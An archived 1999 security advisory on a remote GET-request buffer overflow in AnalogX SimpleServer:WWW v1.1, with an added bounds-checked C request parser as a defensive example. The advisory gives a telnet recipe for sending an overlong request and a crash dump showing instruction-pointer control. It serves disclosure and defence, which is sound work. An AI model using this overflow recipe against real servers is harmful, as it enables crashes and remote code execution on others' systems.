analogx.www.txt

02 Jan 2000 00:00:00 | Reported by Underground Security Systems Research | Type: packetstorm | Source: packetstormsecurity.com

Local/Remote Buffer Overflow in AnalogX SimpleServer:WWW v1.1 allows arbitrary code execution.

Code
`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
  
Happy New Year! to All!!  
  
  
Local / Remote GET Buffer Overflow Vulnerability in AnalogX  
SimpleServer:WWW HTTP Server v1.1  
  
USSR Advisory Code: USSR-99029  
  
Release Date:  
December 31, 1999 [5/5] (not the original one), original [5/5] will  
be released 15/01/1900 :)  
  
Systems Affected:  
AnalogX SimpleServer:WWW HTTP Server v1.1 for Win9x and possibly  
other versions.  
  
About The Software:  
Introducing AnalogX SimpleServer:WWW, the first in a series of simple  
to use yet powerful servers! This webserver is SO easy to use, about  
the only thing you need to know how to do is drag and drop files;  
then just click on the 'Start' button, and your webserver is up and  
running, serving your pages to the world! SimpleServer:WWW supports  
MIME file typing, CGI, common log format, and multi-hosting, just to  
name a few! If you've always wanted a compact, easy to use, versatile  
webserver, then your prayers have been answered.  
  
THE PROBLEM  
  
UssrLabs found a local / remote buffer overflow. The code that  
handles GET commands has an unchecked buffer that will allow  
arbitrary code to be executed if it is overflowed.  
  
Do you do the w00w00?  
This advisory also acts as part of w00giving. This is another  
contribution to w00giving for all you w00nderful people out there.  
You do know what w00giving is don't you?  
http://www.w00w00.org/advisories.html  
  
Example  
[hell@imahacker]$ telnet die.communitech.net 80  
Trying example.com...  
Connected to die.communitech.net  
Escape character is '^]'.  
GET (buffer) HTTP/1.1 <enter><enter>  
  
Where (buffer) is approx. 1000 characters. At this point the server  
overflows.  
  
On the remote machine, someone will see something like this:  
  
HTTP caused an invalid page fault in  
module <unknown> at 0000:41414141.  
Registers:  
EAX=00afffbc CS=017f EIP=41414141 EFLGS=00010246  
EBX=00afffbc SS=0187 ESP=00af0060 EBP=00af0080  
ECX=00af0104 DS=0187 ESI=816294f0 FS=0e47  
EDX=bff76855 ES=0187 EDI=00af012c GS=0000  
Bytes at CS:EIP:  
  
Stack dump:  
bff76849 00af012c 00afffbc 00af0148 00af0104 00af0238 bff76855  
00afffbc 00af0114 bff87fe9 00af012c 00afffbc 00af0148 00af0104  
41414141 00af02f0  
  
Binary or source for this Exploit (when we finish it):  
  
http://www.ussrback.com/  
  
Vendor Status:  
Informed.  
  
Vendor Url: http://www.analogx.com/  
Program Url:  
http://www.analogx.com/contents/download/network/sswww.htm  
  
Credit: USSRLABS  
  
SOLUTION  
Nothing yet.  
  
Greetings:  
Eeye, Attrition, w00w00, beavuh, Rhino9, ADM, L0pht, HNN, Brock  
Tellier, Technotronic and Wiretrip.  
  
u n d e r g r o u n d   s e c u r i t y   s y s t e m s   r e s e a r c h  
http://www.ussrback.com  
  
  
-----BEGIN PGP SIGNATURE-----  
Version: PGPfreeware 6.5.2 for non-commercial use <http://www.pgp.com>  
  
iQA/AwUBOGxnX9ybEYfHhkiVEQJfPgCghGxZoscsKViKd3Uh4bBBolTJMo4AoIXm  
3LuzCgF1g3827IQRfuP5qtZw  
=Nksc  
-----END PGP SIGNATURE-----  
  
  
`
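
The advisory attributes the crash to an unchecked buffer in the GET handler but shows no server code. As an added example (not AnalogX's or USSR Labs' code), this C request-line parser checks the target length before copying, so an overlong target like the roughly 1000-character one above is answered with 414 instead of being copied; `TARGET_MAX`, `parse_get_line` and `status_for_target_len` are names and limits assumed for this example.

```c
#include <stddef.h>
#include <string.h>

#define TARGET_MAX 255 /* assumed policy limit, not a value from the advisory */

/* Parse "GET <target> HTTP/..." from a buffer of known length.
 * Returns an HTTP status: 200 ok, 400 malformed, 414 target too long.
 * Never writes more than out_cap bytes to out. */
int parse_get_line(const char *line, size_t len, char *out, size_t out_cap)
{
    static const char method[] = "GET ";
    const size_t mlen = sizeof method - 1;
    const char *start, *sp;
    size_t tlen;

    if (out_cap == 0 || len < mlen || memcmp(line, method, mlen) != 0)
        return 400;
    out[0] = '\0';
    start = line + mlen;
    /* The target ends at the next space; search only inside the input. */
    sp = memchr(start, ' ', len - mlen);
    if (sp == NULL || sp == start)
        return 400;
    tlen = (size_t)(sp - start);
    /* Check the length before any copy: the step an unchecked handler omits. */
    if (tlen > TARGET_MAX || tlen >= out_cap)
        return 414;
    /* Require " HTTP/" after the target. */
    if (len - mlen - tlen < 6 || memcmp(sp + 1, "HTTP/", 5) != 0)
        return 400;
    memcpy(out, start, tlen);
    out[tlen] = '\0';
    return 200;
}

/* Constructed sample input: "GET " + n filler bytes + " HTTP/1.1". */
int status_for_target_len(size_t n)
{
    char req[2048], out[TARGET_MAX + 1];
    if (n > sizeof req - 13)
        return -1;
    memcpy(req, "GET ", 4);
    memset(req + 4, 'A', n);
    memcpy(req + 4 + n, " HTTP/1.1", 9);
    return parse_get_line(req, 4 + n + 9, out, sizeof out);
}
```

The caller passes the number of bytes actually read from the socket as `len`, so the parser never depends on a terminating NUL in network input.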
